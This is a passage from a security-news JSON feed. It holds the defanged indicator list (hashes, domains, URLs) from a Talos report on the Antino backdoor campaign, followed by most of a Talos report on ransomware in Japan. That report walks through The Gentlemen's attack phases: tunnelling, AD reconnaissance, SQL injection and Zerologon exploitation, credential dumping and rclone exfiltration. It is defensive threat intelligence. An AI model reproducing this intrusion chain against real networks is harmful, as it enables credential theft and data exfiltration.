HTA stager - CSIS Indo-Pacific lure)&#xa0; e6ff096a0562c0042b09d250bd60272ffcd8d72bd95c563842acf765a8dc8bcf (malicious HTA stager - Bajo de Masinloc lure)&#xa0; 4d0fdce4c098635fe9b296c3a82c74645f9885eb5e383aa44a0fe7e50da3ca3f (malicious HTA stager - Taiwan information-warfare workshop lure)&#xa0; f1ef5fe4c0cdcff13cc750c867728b89719f81437bdc49041edd1ae1f3edb4e8 (malicious HTA stager - Taiwan legislative-tax lure)&#xa0; 01b5c6acb20e41799a0e96d9d1d6e1c44791883706b6285e874fcb15cc93b31a (malicious HTA stager - Venezuela and Ukraine news lure)&#xa0; 5a35fcd4458e808ab0fa52bb2a92923b60566ee4d7aaadaac7c95cad3d839562 (malicious HTA stager - Venezuela and Ukraine news lure)&#xa0; 17b53ffa8e005f0e82491d3f9c0a4984c44da52e1668a855c11a137f627c5b4b (malicious HTA stager - institutional disciplinary-action lure)&#xa0; 484ab497072ea09f12187b349f5b1c80754e4942408a009cccb20a2a3c8c6506 (malicious WSF stager - institutional disciplinary-action lure)&#xa0; 3a94910eb8022592ce030e6861359f7e980fc1b5a6ccd290cbb071d3e95ed02a (malicious HTA stager - TPiE inauguration lure)&#xa0; 6a1dbbfcfe6867ac83d35012b2717084388b4a34707efd0b725466dfd0e8fa56 (malicious WSF stager - TPiE inauguration lure)&#xa0; 75c12795016ae48b1bddd34a9f5adea63a12f58701eae01e1b4ab3d9dfa1513c (malicious HTA stager - Tehran bilateral-summit lure)&#xa0; bd8ddc8f33e0fe43147ee6f1713654996420a27c5d2cd91751ad67124ebc6fe4 (malicious WSF stager - Tehran bilateral-summit lure)&#xa0; b75492466462141c56d97b705f0c606faf272577631dc2822aa8d6bda53633b6 (malicious HTA stager - cross-border repression seminar lure)&#xa0; 23d5f1af8581ae200615d9a66d539f2043c3248b649e862557b379d7e8b7a3ac (malicious WSF stager - cross-border repression seminar lure)&#xa0; 0b4e5e017c0f0ccac79e13ca5d580a75af67a24ca0763f9ebfdaaeb1ba4fc739 (malicious HTA stager - Latin carnival lure)&#xa0; ae1b45fb56b9f1b9cb3ee30d2bb1279c9b90b70bb62f8de305d198c6a4e0585e (malicious WSF stager - Latin carnival lure)&#xa0; cd3509fa82e506cc6f2eeafa0a45d4b8b76a07edadd29779daf00568febcaba7 (malicious HTA stager - C-DAC lure)&#xa0; b8e6e83a73e6e07f8873c364dd2a4b830bceb60758163e2efcd7e387cb604655 (malicious WSF stager - C-DAC lure)&#xa0; 7969ae5f11fc163049c8eadba06f814f5edece13a707e6087c1c49011a45b838 (malicious HTA stager - Latin carnival lure variant)&#xa0; aea5e9029f9212d05bde10f7806d1f2819be45d167e6fd877b9fb1b11088ac90 (malicious WSF stager - Latin carnival lure variant)&#xa0; 7fa98efba59614cec0b7291aedee98764f8dc037b6cc798c93951a31208e9e32 (malicious HTA stager - internal-review lure)&#xa0; 65f4b9292e91abfa5adf42a03526932930c1c0a436bb186a7948fe6770295788 (malicious WSF stager - internal-review lure)&#xa0; 61a8f5add6c35f99c389012dbb2343061fd0b54611b40490b9a7f0b49d707da0 (Antino-chain Stage 2 JScript downloader and decryptor)&#xa0; 747b1d13bdf06956b5da5f47250fefd5284ebcf7961971732c3d348aa1a2d533 (Antino-chain Stage 2 JScript downloader and decryptor)&#xa0; a13182699a12a8dd9d07c336dbd8de5e9b086b9b09793b7de2e9761aa03ce1dc (Antino-chain Stage 2 JScript downloader and decryptor)&#xa0; 2f1513c822af0c6635dd3c69dc38f0b2f6e02012ea36415fff111a5d4d5fae05 (Antino-chain Stage 2 JScript downloader and decryptor)&#xa0; a0e91085f08956a9a7034ace73cee60cb211f5d96f02bc91a026601bde8f2221 (Antino-chain Stage 2 JScript downloader and decryptor - HTA branch)&#xa0; 47f98dfe01759a464e22d5ec55d012dccb38ce010dd73e3ba8d7ffefca12b4b2 (Antino-chain Stage 2 JScript downloader and decryptor - WSF branch)&#xa0; b3416726a064dd7f657bbb400adeb365eea7f8bb60783ad2d9da1a1d93768731 (Antino-chain Stage 2 JScript downloader and decryptor - HTA branch)&#xa0; 0a6fb71ab1362d065c7ec2678c1e73d9a0721b0e7099d392ba7559bb2eec4970 (Antino-chain Stage 2 JScript downloader and decryptor - WSF branch)&#xa0; f0c1dc6d6daa4d010932c7818ed5f22929c182f58e5f495fabe2fb3cfc835b97 (Antino-chain encrypted JScript orchestrator)&#xa0; 5555e904101689351a2a1359c9c06da0a57139a9470df7d26823c1b75db55041 (Antino-chain encrypted BinaryFormatter resource)&#xa0; 5168a2696a0ed858f996f388bfe94f952d475158f4ee6206816608936db005ca (Antino-chain encrypted BinaryFormatter resource)&#xa0; 7c2ac9c040b3300bffa7d2e435dbb1bc12e7efd644d2216d603c72121266395c (Antino-chain encrypted JScript orchestrator)&#xa0; d87201c1299a7f5854929645e6891c6c424d2a690031272bedacba7c5fe73a3e (Antino-chain encrypted BinaryFormatter resource)&#xa0; 334f39279ff3aae40fe74340c887ae018c75bc42790586bdf9070adb5889100c (Antino-chain encrypted BinaryFormatter resource)&#xa0; 077bd873217d8abfbb6482d11966ca34f3fef7ad5166f24fbc5dc3ddefe894a1 (Antino-chain encrypted JScript orchestrator)&#xa0; ad0bd2b45e2416fb1384bf30af068d857e7c06b4226615d66b55b610a34c5670 (Antino-chain encrypted BinaryFormatter resource)&#xa0; e2f59d8d5a81583ed482b6c7bf37699efdb2264e452cf7d8cfc0c54dfbd9ab3f (Antino-chain encrypted BinaryFormatter resource)&#xa0; 3a4c9020eeb5ef22a1ff443e606ccb6705fe287c583121c713d2c9f9f1f2a2af (Antino-chain encrypted JScript orchestrator)&#xa0; 4b614e5c37abaddca162119e42a969945caa681305e246e0ed0060ea9984008b (Antino-chain encrypted JScript orchestrator)&#xa0; c8e1239d7276178b6620f47ec4880494be1cb394477b223fc54bffb0947bff50 (Antino-chain encrypted BinaryFormatter resource)&#xa0; 079acd58a74479ac8b108b618d2a4da8a8bd560a04459cd90e2fec9da5027513 (Antino-chain encrypted BinaryFormatter resource)&#xa0; 8e1d68906d6de92f359945d3a95da1480e72773a3e8dea7682d6bf0f6699f75f (Antino-chain encrypted JScript orchestrator)&#xa0; 170b0eee60a335f32c1d0c19a0bb8d8bbc0a5b298ea9486b546f58d25cc8a464 (Antino-chain encrypted BinaryFormatter resource)&#xa0; b31ca75f73a9363b0e35042a41216c3f581eaa0b9cd78cb58f089c2e40babd40 (Antino-chain encrypted BinaryFormatter resource)&#xa0; d753a615aedf8e58ffc75b2b7ebd320c0cbe6bcb5cbb885db749a2a85c55d3bf (Antino-chain TestAssembly.dll downloader)&#xa0; 133a46ba41136ca21c93fb08c28446826d8c0d9b7923a16f2d152d595a710098 (Antino-chain TestAssembly.dll downloader)&#xa0; 9fc50cf28f86201fda8306926817b1ede41fdd993202515905dd072f6803542f (Antino-chain TestAssembly.dll downloader)&#xa0; d4cb2f5df16ec9b9c5b796ae55848534e15d4f8b8806f0431108fc7a99a2548a (Antino-chain TestAssembly.dll downloader)&#xa0; 131ac3e0df777910e0a32e43d5744bccb0490750d4c2adc359da41d76d383c46 (Antino-chain TestAssembly.dll downloader)&#xa0; 09ef7c736bccfafefc44d9910d499173b88063b73b221fc0dc9e9105107e5cff (Antino Gen 2 slc.dll backdoor)&#xa0; 0c39264337a1186b2e765e24073399cbdcba118306614eb411e315887af578bd (Antino Gen 2 standalone fake-installer backdoor)&#xa0; 1fadc90b61ce536abda78eb387a7f3d745f00c16775d3f762845ccc0fde567da (Antino Gen 1 slc.dll backdoor)&#xa0; 40e7e77aff603f4c2ef17b3bc8ea836e714d0734a1e5b946e52f95536ec5c91d (configured Antino Gen 1 standalone backdoor)&#xa0; 5c5c060b272cd4a5c3767edc0e9478bd35b7e1756e183d0446a5491bd65519cb (configured Antino standalone backdoor)&#xa0; 971cb2448b5d67dcc1f5eaa10d12e77f213035ad31230dc2ac7a510610a2059d (Antino Gen 2 standalone fake-installer backdoor)&#xa0; 9b7df409c9a89f7536d3ba7b6d43fb6dbac618c8bb52615ba34cc971ad71bbf3 (Antino Gen 2 standalone fake-installer backdoor)&#xa0; b90a4e770869c28fd2140acb3ebdc50c113bb6f096b4bbdb9ac87c349c70e85e (Antino Gen 2 standalone fake-installer backdoor)&#xa0; ca14ad0344dc7216f6da29a5cbe4237d886cc5257e8c3a48fb4885a311c9b800 (post-unpack Antino standalone backdoor memory image)&#xa0; e2eb7703047b37b28dc34e6990205d758a2454b39bc655b460606745fadcb530 (Antino Gen 2 slc.dll backdoor)&#xa0; e7e3b0bcd6798634adf8b49d305f3a7b7682e4b76db549682a183c5a186df4bb (Antino Gen 2 slc.dll backdoor)&#xa0; fdbd047031c13a17c9f491c9355f44d587584ebe2b8927be8482e6c236c8e1c1 (Antino Gen 2 slc.dll backdoor)&#xa0; 103[.]27[.]110[.]220 (historical serving IP for the Antino payload hosted on wps-cn[.]com)&#xa0; osc-cdn[.]com (actor-used spear-phishing sender domain)&#xa0; oisadjfoinsiduhfnoisdnfosdnoifnsoid[.]pages[.]dev (Cloudflare Pages execution-tracking domain)&#xa0; d2nq35tel3ucuo[.]cloudfront[.]net (Antino-chain CloudFront staging domain)&#xa0; pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev (Antino-chain Cloudflare R2 staging domain)&#xa0; pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev (Antino-chain Cloudflare R2 staging domain)&#xa0; my-3lyt6wcp[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-qc39r814[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-662ylt3w[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-6g16qsfe[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-goq6xmbm[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-h3qli6kq[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-sv7c1fzs[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-u0up9qri[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-vtsdod2n[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; my-wgoxp32b[.]pages[.]dev (Cloudflare Pages delivery domain)&#xa0; microsoft-flash[.]com (standalone Antino fake-installer delivery domain)&#xa0; wps-cn[.]com (standalone Antino fake-installer delivery domain)&#xa0; hxxps://microsoft-flash[.]com/download/flashcenter_pp_ax_install_en.exe (standalone Antino fake-installer delivery URL)&#xa0; hxxps://www[.]wps-cn[.]com/downloads/flashcenter_pp_ax_install_en.exe (standalone Antino fake-installer delivery URL)&#xa0; hxxps://my-662ylt3w[.]pages[.]dev/Institutional_Disciplinary_Action_Report_May_2026.hta (malicious HTA delivery URL)&#xa0; hxxps://my-662ylt3w[.]pages[.]dev/Institutional_Disciplinary_Action_Report_May_2026.wsf (malicious WSF delivery URL)&#xa0; hxxps://my-6g16qsfe[.]pages[.]dev/the%20May%2027%20inauguration%20of%20the%20TPiE.hta (malicious HTA delivery URL)&#xa0; hxxps://my-6g16qsfe[.]pages[.]dev/the%20May%2027%20inauguration%20of%20the%20TPiE.wsf (malicious WSF delivery URL)&#xa0; hxxps://my-goq6xmbm[.]pages[.]dev/Tehran_Bilateral_Summit_Proceedings_May2026.hta (malicious HTA delivery URL)&#xa0; hxxps://my-goq6xmbm[.]pages[.]dev/Tehran_Bilateral_Summit_Proceedings_May2026.wsf (malicious WSF delivery URL)&#xa0; hxxps://my-h3qli6kq[.]pages[.]dev/CrossBorder_Repression_Seminar_Agenda.hta (malicious HTA delivery URL)&#xa0; hxxps://my-h3qli6kq[.]pages[.]dev/CrossBorder_Repression_Seminar_Agenda.wsf (malicious WSF delivery URL)&#xa0; hxxps://my-sv7c1fzs[.]pages[.]dev/Extravaganza%20Latin%20Carnival.hta (malicious HTA delivery URL)&#xa0; hxxps://my-sv7c1fzs[.]pages[.]dev/Extravaganza%20Latin%20Carnival.wsf (malicious WSF delivery URL)&#xa0; hxxps://my-u0up9qri[.]pages[.]dev/UO%20-C-DAC%20%281%29.hta (malicious HTA delivery URL)&#xa0; hxxps://my-u0up9qri[.]pages[.]dev/UO%20-C-DAC%20%281%29.wsf (malicious WSF delivery URL)&#xa0; hxxps://my-vtsdod2n[.]pages[.]dev/Extravaganza%20Latin%20Carnival%20post%20copy.hta (malicious HTA delivery URL)&#xa0; hxxps://my-vtsdod2n[.]pages[.]dev/Extravaganza%20Latin%20Carnival%20post%20copy.wsf (malicious WSF delivery URL)&#xa0; hxxps://my-wgoxp32b[.]pages[.]dev/Internal_Review_Dossier_0520.hta (malicious HTA delivery URL)&#xa0; hxxps://my-wgoxp32b[.]pages[.]dev/Internal_Review_Dossier_0520.wsf (malicious WSF delivery URL)&#xa0; hxxp://d2nq35tel3ucuo[.]cloudfront[.]net/4oyE4n4ozLQ0.log (Antino-chain Stage 2 URL)&#xa0; hxxp://d2nq35tel3ucuo[.]cloudfront[.]net/LtVGUSsyUTDA.log (Antino-chain Stage 2 URL)&#xa0; hxxp://d2nq35tel3ucuo[.]cloudfront[.]net/TzzyYlYnJ40Z.log (Antino-chain Stage 2 URL)&#xa0; hxxp://d2nq35tel3ucuo[.]cloudfront[.]net/tdyvHHVcrci8.log (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/Qw7Womin4X6N (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/kVFPxm1uAjOY (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/5SVIdjpRQjkZ (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/PbyfSk69AwVf (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/qMD71Z95clTf (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/HenUWB51MwpG (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/q9LgxIaU1CJK (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/BKvYRxPiGpbM (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/nswz3cb9lhuC (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/6HJV5qV5BTLs (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/MKJacn3hFt3Y (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/cX8MChhuVvzz (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/byrdvvZEZZlk (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/5TGrbjCCLa8M (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/s0p18dgHR4PZ (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/zlKDeyO3HuUS (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/icWMOGLJcfQO (Antino-chain Stage 2 URL)&#xa0; hxxp://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/5U7kzhvlYlVF (Antino-chain Stage 2 URL)&#xa0; hxxps://d2nq35tel3ucuo[.]cloudfront[.]net/9q9OlLKCm0an2ct1.js (Antino-chain encrypted JScript orchestrator URL)&#xa0; hxxps://d2nq35tel3ucuo[.]cloudfront[.]net/LwqPW64Xl0ti3q7s.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://d2nq35tel3ucuo[.]cloudfront[.]net/HsOw0YU9s11dxyr1.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/0u25lAqY58or53ra.js (Antino-chain encrypted JScript orchestrator URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/gpv0IRMtvto6e8t2.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/HzjNPgRE9ir92e38.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/2laZiB2zvnx04jze.js (Antino-chain encrypted JScript orchestrator URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/wyLwwCu43j1wf2pg.js (Antino-chain encrypted JScript orchestrator URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/ThyI9pwewrh_a1pr.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/8ypvQLxJvggmrz94.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/vD68BdmB2ky28gcc.js (Antino-chain encrypted JScript orchestrator URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/oaFE7PJHk0h_emqt.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/AcPP9fCvdjztmho8.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/7ChyKauxbnuftp68.js (Antino-chain encrypted JScript orchestrator URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/KOOOT4a76st012bx.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/Ub4RJzNIrfleri8t.txt (Antino-chain encrypted BinaryFormatter resource URL)&#xa0;&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/HeiqAW6ZGatherOsState.exe.luy (Antino sideload-package URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/HeiqAW6Zslc.dll.pzs (Antino backdoor delivery URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/HeiqAW6ZOsGather.dat.syk (Antino sideload-package URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/hjgzBskgGatherOsState.exe.lzj (Antino sideload-package URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/hjgzBskgslc.dll.iwq (Antino backdoor delivery URL)&#xa0; hxxps://pub-abfa7742e315485a98a5fafd6dbfb68e[.]r2[.]dev/hjgzBskgOsGather.dat.ael (Antino sideload-package URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/bzP3NcRPGatherOsState.exe.thl (Antino sideload-package URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/bzP3NcRPslc.dll.czh (Antino backdoor delivery URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/bzP3NcRPOsState.dat.mxb (Antino sideload-package URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/VD7F3WxnGatherOsState.exe.mtm (Antino sideload-package URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/VD7F3Wxnslc.dll.fsc (Antino backdoor delivery URL)&#xa0; hxxps://pub-0173d1566dcd4fd49fa25f11f14bfe4c[.]r2[.]dev/VD7F3WxnOsState.dat.pgy (Antino sideload-package URL)&#xa0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-spotlight","cisco-talos-dns-security","cisco-talos-malware-protection","cisco-talos-email-threat-prevention","geo:inferred"],"relatedCves":[],"titleFingerprint":"11587-across-antino-asia-backdoor-china-government-nexus-organizations-policy-targets-uat","countryCodes":["CN","HK","IN","KH","MM","PH","PK","RU","SG","TH","TW","UA","VE"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/china-nexus-uat-11587-targets-government-and-policy-organizations-across-asia-with-antino-backdoor/","type":"report","title":"Cisco Talos: China-nexus UAT-11587 targets government and policy organizations across Asia with Antino backdoor"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-30T10:00:01.000Z","addedAt":"2026-09-30T10:52:59.012Z","updatedAt":"2026-09-30T10:52:59.012Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"3b3f8766-0cd2-498c-b70a-e82df85a4cec","slug":"talos-ransomware-incidents-in-japan-in-the-first-half-of-2026-b4e6bb95","externalId":"6aa8af7250811100013b9427","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Ransomware incidents in Japan in the first half of 2026: Investigation of The Gentlemen’s infrastructure and evidence of Qilin's AI use","description":"Compared with the same period last year, ransomware incidents in Japan increased slightly by approximately 4.7%, indicating that ransomware continues to pose a significant threat.In Japan, The Gentlemen was the most active ransomware group in the first half of 2026.Attackers continue to primarily target small- and medium-sized enterprises, with organizations capitalized at less than JPY 1 billion accounting for approximately 80% of the total &#x2014; an increase of around 13% from the previous year.The total number of listings on The Gentlemen&#x2019;s leak site increased from 48 in January to 105 in July, representing approximately a 2.2-fold increase in activity. Additionally, there is a possibility that Russian-speaking individuals are involved in The Gentlemen&#x2019;s attacks.Qilin, which recorded the second-highest number of observed incidents in 2026 after The Gentlemen, is leveraging AI to improve the efficiency of its operations.Victimized companiesFigure 1 summarizes ransomware incidents affecting Japanese companies from January to July 2026. According to Cisco Talos research, 90 organizations in Japan were affected by ransomware during this period. Compared with 86 incidents during the same period from January to July last year, this represents a slight increase of approximately 4.7%, indicating that ransomware incidents continue to remain at a high level. On a monthly basis, there were approximately 13 incidents per month on average. The number of incidents increased in March and April, with April recording the highest number during the period at 19 incidents. Cases involving overseas offices and subsidiaries accounted for 13.3% of the total. Among these, Taiwan recorded the highest number of incidents, followed by the United States and the Philippines, which recorded the same number of incidents, with multiple cases identified in each country. Figure 1. Ransomware incidents in Japan during the first half of 2026 (January through July).The manufacturing sector continued to be the most affected industry, accounting for 34% of incidents, followed by the information and communications sector at 11% and the services sector at 9% (see Figure 2). Figure 2. Percentage of victim organizations by industry.In terms of the size of the affected organizations, those with capital of less than JPY 100 million accounted for the largest share at 48%, followed by organizations with capital of JPY 100 million to less than JPY 1 billion at 30%. Combined, organizations with capital of less than JPY 1 billion accounted for 78% of the total, representing an increase of around 13% from 69% in 2025. This suggests that attackers are increasingly focusing their efforts on small- and medium-sized enterprises (see Figure 3). Figure 3. Classification of victim organizations by capital size (excluding unknown).Most frequently observed ransomware types in JapanIn Japan, the most frequently observed ransomware group in the first half of 2026 was The Gentlemen, with 14 incidents. This was followed by Qilin, which caused the highest number of incidents last year, and SafePay, which had relatively few confirmed incidents during the same period last year, with seven incidents each. The Gentlemen and SafePay have increased their activity this year and can be considered emerging ransomware groups that require increased vigilance. Other ransomware groups observed include NightSpire, NetRunner, LockBit 5.0, RansomEXX, Stormous, and AiLock. Looking at the ransomware groups observed this year, very few of the groups that were active during the same period last year have been observed, highlighting the rapid changes in the ransomware threat landscape. Figure 4. Number of incidents by ransomware type used in attacks (excludes unidentified cases).In the following sections, we examine the most prominent groups during the period, The Gentlemen and Qilin, and provide an overview of The Gentlemen, the tools it uses, attack flow and findings related to its attribution, as well as examining Qilin&#x2019;s use of AI. Overview of The Gentlemen ransomwareThe Gentlemen ransomware group has been active since around July 2025. Although it is a relatively new group, it has been expanding its operations through a Ransomware-as-a-Service (RaaS) model and has already caused significant damage to organizations worldwide. The group uses a double-extortion strategy, encrypting victims&#x2019; data while also threatening to publish stolen information unless a ransom is paid. Figure 5. The Gentlemen data leak site.Figure 6 shows the monthly number of listings on The Gentlemen data leak site worldwide. From January to July 2026, the number of listings shows an overall upward trend despite some month-to-month fluctuations. The number increased sharply from 48 in January to 87 in February. From March through May, it remained relatively stable at around 70 &#x2013; 74 listings per month. In June, however, the number exceeded 100 for the first time, reaching 108, and remained high at 105 in July. In particular, the figures for June and July were notably higher than those in the preceding months, indicating that listing activity has intensified compared with the beginning of the year. Compared with 48 listings in January, the 105 listings recorded in July represent an increase to approximately 2.2 times the January level. Figure 6. Monthly total listings on The Gentlemen leak site (January &#x2013; July 2026).By industry, manufacturing accounted for the largest share at 21%, followed by professional, scientific, and technical services at 16%, and wholesale trade at 13%. These three industries clearly stood out in terms of the number of incidents. Among the remaining industries, retail trade accounted for 6%, while construction and health care/social assistance each accounted for 5%, showing a substantial gap from the top three. Incidents were also observed across a wide range of other industries, including information, finance and insurance, transportation and warehousing, and educational services. Overall, while the activity is not concentrated exclusively in any single industry, manufacturing; professional, scientific, and technical services; and wholesale trade are particularly prominent in terms of the number of observed cases. Figure 7. Industries targeted by The Gentlemen.Investigation of The Gentlemen&#x2019;s open directory infrastructureTalos identified open directory infrastructure believed to have been used by a threat actor associated with The Gentlemen. During our investigation, we observed numerous tools used to support ransomware operations. Our investigation found ransomware targeting ESXi and Windows environments linked to The Gentlemen. We also identified RustHound, a cross-platform Rust-based tool used to collect Active Directory (AD) information required for attack path analysis with BloodHound; exploit code targeting CVE-2025-2479, a SQL injection vulnerability that can allow unauthorized manipulation of databases; the adversary-in-the-middle (AitM) tool Responder; impacket-partial-mic, which can be used for NTLM authentication relay attacks; Ligolo-ng, which establishes tunnels into compromised networks and enables access to internal networks from external systems; the tunneling tool chisel; the remote desktop tool AnyDesk; and the file transfer tool Rclone. Figure 8 illustrates the attack flow inferred from the commands recorded in .bash_history. Figure 8. Attack flow inferred from traces observed in The Gentlemen&#x2019;s attack infrastructure.In Phase 1, the actor uses VPN software and tools such as Chisel and Ligolo to establish network routes and turn its server into an attack platform. The actor then repeatedly installs and configures reconnaissance tools such as nmap and masscan, along with BloodHound, NetExec, Responder, and Impacket for targeting AD environments, all within the same command history. Once the attack platform had been established, the threat actor proceeded to Phase 2: target reconnaissance. They appear to have used Masscan and Nmap to assess publicly exposed hosts, VPN-related ports, web services, SMB, and other active services in order to understand the external and internal network structure. Upon gaining access to the internal network, they used NetExec to enumerate SMB shares, host information, LDAP, and computer information in Active Directory. They may also have used RustHound/BloodHound-related tools to collect domain users, groups, computers, administrative privileges, and trust relationships, with the aim of identifying paths that could be used for lateral movement and privilege escalation. Figure 9. Collection of information on publicly exposed hosts and domain users.Following target selection, during Phase 3, we observed the actor downloading and executing Proofs of concept, reconnaissance scripts, and attack tools associated with known vulnerabilities against publicly exposed web services and administrative interfaces. Specifically, the actor attempted to exploit CVE-2025-24799, an unauthenticated SQL injection vulnerability in GLPI, using both a PoC and sqlmap to retrieve user information from the database. The actor also used a scanner targeting cPanel/WHM and downloaded and executed a PoC to test for authentication bypass vulnerabilities. In Phase 4, the threat actor leveraged the information obtained in Phase 3 to expand the operation into the internal network and Active Directory environment. The actor appears to have collected and validated credentials used within the target environment in an attempt to gain access to multiple hosts and services. The command history shows the installation and execution of tools targeting Windows authentication and Active Directory, including Responder, NTLM relay-related tools, Impacket, and NetExec. We also observed traces suggesting the exploitation of CVE-2020-1472 (Zerologon) and the vulnerabilities associated with MS17-010. In Phase 5, the threat actor not only investigated the internal network but also used compromised access paths and credentials to move incrementally toward more critical hosts. The actor used VPN, Chisel, Ligolo-ng, SSH, and Proxychains to establish communication paths from the attacker-controlled server into the target organization&#x2019;s internal network. They then used NetExec and Impacket to attempt authentication to services such as SMB, LDAP, RDP, and WinRM, seeking access to multiple hosts and attempting lateral movement. This activity indicates an effort to reach critical servers and Active Directory management infrastructure within the internal network. In Phase 6, involving information collection and exfiltration, the threat actor mounted a backup share via CIFS at /mnt/Backup and inspected the Windows file system within VHDX backups. The command history records the installation of libguestfs-tools, qemu-utils, and nbd-client, the creation of directories such as /mnt/vhdx, and the copying of ntds.dit, SAM, and SYSTEM. The actor then used Impacket&#x2019;s secretsdump.py to extract credentials and password hashes from the collected ntds.dit and SAM files, saving the results as &#x201c;ntds.txt&#x201d; and &#x201c;SAM.txt&#x201d;. We also identified traces indicating that the VHDX files were compressed with zstd and transferred to cloud storage services such as Wasabi using rclone. The attackers initially attempted the transfer using the default settings and subsequently reconfigured and reran the process to improve transfer speed and communication stability. The VHDX file was split into 256MiB chunks, with up to 16 files uploaded concurrently to reduce the overall upload time. Detailed progress reporting, connection timeouts, retries following transfer failures, and logging to a file were also specified. This suggests that the attackers were deliberately focused on exfiltrating large volumes of data and intended to maintain and monitor the transfer process. Figure 10. Information exfiltration (excerpt).Following the completion of an 